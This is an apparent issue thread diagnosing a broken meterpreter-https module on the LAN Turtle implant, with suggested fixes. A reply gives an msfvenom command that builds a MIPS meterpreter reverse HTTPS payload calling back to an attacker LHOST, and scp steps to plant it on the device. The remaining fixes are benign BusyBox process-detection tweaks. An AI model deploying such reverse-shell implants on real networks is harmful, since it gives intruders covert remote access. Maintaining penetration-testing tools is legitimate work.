meterpreter-https module broken since ~2017

[egg82]

Using the Python payload on modern installations of metaploit will send a compressed payload to the LAN turtle. It is expected that the payload with be un-base64'd and then Python's zlib module used to decompress the payload before executing (see rapid7/metasploit-framework#8387)

The Python zlib module doesn't work on the LAN turtle (missing ctypes module, see https://gist.github.com/colinmarc/2152055)

The workaround, currently, is to generate a mipsbe payload (payloads/linux/mipsbe/meterpreter_reverse_https) and replace /etc/turtle/meterpreter/met-https-shell with it. The sshfs module helps with this process.

Furthermore, the command ps | grep -w -q [/]etc/turtle/meterpreter/met-https-worker found here will always return false and replacing it with "met-https-worker" will also return false as the output of ps will truncate to {met-https-worke}. This causes the turtle module to think that it was never started, which means stopping the module needs to happen manually by running kill $(pgrep -f met-https-worker) in the shell.

[bad-antics]

Great diagnosis — both issues are real and still affect current installations.

Fix 1: Compressed payload / zlib issue:

As you noted, modern Metasploit sends compressed Python payloads that require zlib→ctypes, which isn't available on the Turtle's minimal Python. The correct workaround is generating a native MIPS payload:

# On your attack machine (Kali/Parrot)
msfvenom -p linux/mipsbe/meterpreter_reverse_https \
  LHOST=<YOUR_IP> LPORT=443 \
  -f elf -o met-https-shell

# Transfer to turtle
scp met-https-shell root@172.16.84.1:/etc/turtle/meterpreter/met-https-shell
chmod +x /etc/turtle/meterpreter/met-https-shell

For newer Metasploit (6.x+), you may also want to try linux/mipsbe/meterpreter/reverse_tcp (staged) or the stageless variant depending on your setup.

Fix 2: Process detection truncation:

The ps output truncation causing the grep to fail is a classic BusyBox limitation. Fix the module script:

# Replace this line:
ps | grep -w -q [/]etc/turtle/meterpreter/met-https-worker

# With:
pgrep -f "met-https-worker" > /dev/null 2>&1

# Or if pgrep isn't available:
ps -w | grep -q "[m]et-https-worker"

The -w flag in BusyBox ps enables wide output (no truncation). Combined with the [m] grep trick (avoids matching the grep process itself), this reliably detects the running process.

For the stop function:

# Replace:
# kill $(netstat... | grep met-https-worker...)
# With:
kill $(pgrep -f met-https-worker) 2>/dev/null